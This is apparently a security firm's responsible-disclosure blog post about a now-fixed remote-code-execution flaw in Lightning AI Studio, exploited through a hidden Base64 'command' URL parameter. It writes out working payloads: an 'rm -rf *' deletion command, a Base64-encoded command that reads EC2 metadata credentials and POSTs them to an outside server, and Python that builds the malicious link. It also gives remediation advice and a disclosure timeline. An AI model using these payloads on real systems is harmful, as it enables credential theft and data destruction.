The fast-paced evolution of AI demands agility and innovation, but this “move fast and break things” approach comes with inherent risks. While MLOps platforms unlock tremendous opportunities, vulnerabilities within these systems can have far-reaching consequences, underscoring the critical need for comprehensive security controls throughout every stage of the AI development lifecycle.
At Noma Security, our research team has collaborated with leading AI companies to identify and address common security risks that could expose sensitive user data. Our commitment to proactive security research aims to fortify the industry’s defenses and promote safer AI innovation.
Our first blog post focuses on one of the most widely adopted AI development tools, Lightning AI Studios.
Executive Summary
This article examines a now-resolved vulnerability in Lightning AI's platform, rated CVSS 9.4, that allowed Remote Code Execution (RCE) through the exploitation of a hidden URL parameter, enabling attackers to execute arbitrary commands with root privileges. This level of access could be leveraged for a range of malicious activities, including the extraction of sensitive keys from targeted accounts, as demonstrated within this article.
Below is a summary of the attack flow:
- The attacker identifies the necessary details about a target, such as the username and the name of their Lightning AI Studio, both of which are publicly accessible through the Studio templates gallery.
- The attacker crafts a malicious link containing code designed for execution on the identified Studio with root permissions.
- When an authenticated victim clicks the malicious link, the command executes in a privileged context, completing the RCE attack.
About Lightning AI
Lightning AI, the creator of PyTorch Lightning and Lightning Studios, offers an all-in-one AI development platform for enterprise-grade AI. Lightning provides full-code, low-code, and no-code tools to build agents, AI applications, and generative AI solutions, Lightning fast. Designed for flexibility, it runs seamlessly on your cloud or theirs, leveraging the expertise and support of a 3M+ strong developer community.
Lightning Studios and its advanced open-source stack, including PyTorch Lightning (with almost 30K stars on GitHub), LitServe, and Fabric, streamline every step, from training and serving to RAG and everything in between. Customers deliver enterprise-grade AI in weeks, not months, while reducing cloud costs by ~60% with features like auto-sleep, fault tolerance, blazing-fast cold starts, and more.
How Lightning AI Studio works
Lightning AI Studio is a flexible platform where each “Studio” serves as a persistent, cloud-based workspace capable of handling diverse data types like images, videos, and text. Accessible via web browser or cloud integration, each Studio functions as a self-contained environment with its own files, data, and infrastructure, preserving installed dependencies and modifications. Built on a VSCode-like IDE, it offers a familiar development experience with added features from Lightning AI, such as an integrated terminal.
For more information about Lightning AI Studios, visit the official webpage.
Caption: On the left, an example of studio files; on the right, a terminal opened in a new window.
Attack Flow Details of the RCE Vulnerability
Upon inspecting the JavaScript, we noticed a hidden parameter called command embedded in the URL. Although invisible to the user, it could be modified in the URL to execute arbitrary commands directly in the terminal, indicating the potential for arbitrary command execution.
To exploit the command parameter, its value had to be Base64-encoded; the platform then decoded and executed it. For example, by encoding the malicious command rm -rf * into the payload command=cm0gLXJmICo= (the Base64 representation of that command) and appending it to the URL, we could have forcefully and recursively deleted all files in the Studio.
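As a minimal illustration using only Python's standard library, the payload described above can be produced and round-tripped like this:

```python
import base64


def encode_payload(command: str) -> str:
    """Base64-encode a shell command in the form the hidden
    `command` URL parameter expected."""
    return base64.b64encode(command.encode()).decode()


# The destructive example from this write-up:
payload = encode_payload("rm -rf *")
print(payload)  # cm0gLXJmICo=

# Round-trip: the platform decoded the parameter before executing it.
assert base64.b64decode(payload).decode() == "rm -rf *"
```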
We discovered further malicious use cases when testing commands that query the AWS instance metadata service, potentially exposing sensitive data such as access tokens and user information.
For example, the following Base64-encoded payload:
cmVzcG9uc2U9JChjdXJsIC1zIGh0dHA6Ly8xNjkuMjU0LjE2OS4yNTQvbGF0ZXN0L21ldGEtZGF0Y
S9pZGVudGl0eS1jcmVkZW50aWFscy9lYzIvc2VjdXJpdHktY3JlZGVudGlhbHMvZWMyLWluc3Rhbm
NlKSAmJiBjdXJsIC1YIFBPU1QgLUggIkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbiIgLWQ
gIiRyZXNwb25zZSIgaHR0cDovL3QwdTkxYmNqa20wdnBrdWs0cnNrb3pwdW9sdWNpMzZzLm9hc3Rp
ZnkuY29t
decodes to:
response=$(curl -s http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance) && curl -X POST -H "Content-Type: application/json" -d "$response" ATTACKER_REMOTE_SERVER
This command sends the instance's identity credentials to the attacker's remote server.
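The wrapped Base64 string above can be reassembled and decoded to verify what it does, using nothing beyond Python's standard library (the attacker's collector hostname is redacted as ATTACKER_REMOTE_SERVER in the decoded command shown above):

```python
import base64

# The payload exactly as shown above, re-joined across line wraps.
payload = (
    "cmVzcG9uc2U9JChjdXJsIC1zIGh0dHA6Ly8xNjkuMjU0LjE2OS4yNTQvbGF0ZXN0L21ldGEtZGF0Y"
    "S9pZGVudGl0eS1jcmVkZW50aWFscy9lYzIvc2VjdXJpdHktY3JlZGVudGlhbHMvZWMyLWluc3Rhbm"
    "NlKSAmJiBjdXJsIC1YIFBPU1QgLUggIkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbiIgLWQ"
    "gIiRyZXNwb25zZSIgaHR0cDovL3QwdTkxYmNqa20wdnBrdWs0cnNrb3pwdW9sdWNpMzZzLm9hc3Rp"
    "ZnkuY29t"
)

decoded = base64.b64decode(payload).decode()
print(decoded)

# The decoded command reads the EC2 instance-metadata credentials endpoint...
assert decoded.startswith("response=$(curl -s http://169.254.169.254")
# ...and POSTs the stolen credentials to an external collector.
assert "curl -X POST" in decoded
```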
Crafting the malicious URL
The vulnerability in Lightning AI Studio was in how the platform handled user-specific URLs, particularly through the PROFILE_USERNAME and STUDIO_PATH variables embedded in the URL schema. These URLs allowed access to any publicly shared studio within the platform and followed this schema:
https://lightning.ai/PROFILE_USERNAME/vision-model/studios/STUDIO_PATH/terminal?fullScreen=true
The two variables in the URL schema, PROFILE_USERNAME and STUDIO_PATH, were key to the vulnerability.
- PROFILE_USERNAME is the username each user receives when registering with Lightning AI; it appears on the user's profile page at https://lightning.ai/PROFILE_USERNAME.
- STUDIO_PATH is the path of the Studio the user works in; it can be found in the shared studios section.
So, an attacker could craft a URL that included the command parameter and share it via email, forums, or their own website; every victim who clicked the crafted link would be redirected to the Studio terminal, where the malicious command would execute.
For example,
https://lightning.ai/PROFILE_USERNAME/vision-model/studios/STUDIO_PATH/terminal?fullScreen=true&command=cmVzc...
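Putting the pieces together, the crafted link can be sketched as follows. PROFILE_USERNAME and STUDIO_PATH are placeholders, as in the schema above; this is an illustrative sketch, not the exact exploit script:

```python
import base64
from urllib.parse import urlencode


def craft_malicious_url(profile_username: str, studio_path: str, command: str) -> str:
    """Build the Studio terminal URL with the hidden `command`
    parameter pre-filled, as the attack flow above describes."""
    payload = base64.b64encode(command.encode()).decode()
    # urlencode percent-escapes the Base64 padding ("=" becomes "%3D").
    query = urlencode({"fullScreen": "true", "command": payload})
    return (
        f"https://lightning.ai/{profile_username}/vision-model"
        f"/studios/{studio_path}/terminal?{query}"
    )


url = craft_malicious_url("PROFILE_USERNAME", "STUDIO_PATH", "rm -rf *")
print(url)
```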
To demonstrate how this vulnerability could be exploited, here’s a short PoC (Proof of Concept) recording from before it was fixed.
Impact
A malicious URL could enable execution of arbitrary commands with root privileges, including but not limited to:
- Remote Code Execution: Attackers could execute arbitrary privileged commands in the terminal as the authenticated user, gaining root access.
- Data Exfiltration: Sensitive AWS metadata, tokens, and user data could be accessed and sent to an attacker’s remote server.
- File System Manipulation: Attackers could create, delete, or modify files on the server.
In summary, if exploited by a malicious actor, this vulnerability could have posed a significant risk to both individual users and the creators of shared studios within Lightning AI Studio, with a high probability of exploitation through minimal interaction. The impact could range from unauthorized access to sensitive data or systems to compromising the functionality of the shared studio environment.
Again, vulnerabilities like these underscore the importance of mapping and securing the tools and systems used for building, training, and deploying AI models because of their sensitive nature.
Takeaways
In close collaboration with Lightning AI, we have suggested the following principles to be implemented by the Lightning team, based on their unique knowledge of their system:
- Never trust user-modifiable inputs, even if they are hidden or “non-visible” to users. This includes query parameters, hidden form fields, and URL segments. Always sanitize, validate, and restrict input to a fixed set of known-safe values.
- Avoid direct execution of user-controlled inputs. Directly executing user-provided inputs can introduce risks, as it may allow unintended commands to be processed. A safer approach is to use secure execution methods that isolate or strictly control input handling, reducing the likelihood of command injection vulnerabilities.
- AI development environments should adhere to the principle of least privilege. Developers, processes, and scripts should only have access to what is essential for their task.
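The first principle, restricting input to known-safe values, can be sketched as a server-side allow-list check. This is a hypothetical illustration, not Lightning AI's actual fix, and the ALLOWED_COMMANDS set is invented for the example:

```python
import base64

# Hypothetical allow-list of terminal actions a URL parameter may trigger.
ALLOWED_COMMANDS = {"clear", "ls", "pwd"}


def validate_command_param(raw_param: str) -> str:
    """Decode a Base64 `command` parameter and accept it only if it
    matches a known-safe value; reject everything else."""
    try:
        command = base64.b64decode(raw_param, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        raise ValueError("malformed command parameter")
    if command not in ALLOWED_COMMANDS:
        raise ValueError(f"command not in allow-list: {command!r}")
    return command


# A safe value passes; the attack payload from this article is rejected.
print(validate_command_param(base64.b64encode(b"pwd").decode()))  # pwd
try:
    validate_command_param("cm0gLXJmICo=")  # rm -rf *
except ValueError as err:
    print("rejected:", err)
```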
Thanks
We’re proud to collaborate with organizations like Lightning AI that share a strong commitment to securing the AI development ecosystem. Their urgency and collaboration in addressing this vulnerability demonstrate the power of partnership in maintaining a safer environment for AI innovation.
About Noma Security
Noma enables AppSec teams with complete visibility, security, protection, and compliance across the entire Data & AI Lifecycle — from development to production and from classic data pipelines and ML to GenAI. By combining data and AI supply chain security, AI security posture management, and AI runtime protection in a single platform, Noma seamlessly deploys across any cloud-based, SaaS, or self-hosted environment within minutes, requiring no agents or code changes and adding no friction to data science teams’ day-to-day workflows.
Interested in learning more? Get a demo of the Noma Security Platform
Responsible Disclosure Timeline
- October 14, 2024: RCE found in Lightning AI Studio
- October 14, 2024: Initiated discussion with the Lightning AI team via Discord
- October 14, 2024: First response from the Lightning AI team
- October 20, 2024: Second correspondence
- October 25, 2024: Fix approved and released
Links
- https://thehackernews.com/2025/01/lightning-ai-studio-vulnerability.html
- https://cybersecuritynews.com/critical-rce-vulnerability-found-in-ai-development-platform/
- https://cyberscoop.com/lightningai-vulnerability-noma-cloud-phishing/
- https://cybernews.com/security/critical-vulnerability-ai-development-platform-lightning-ai/


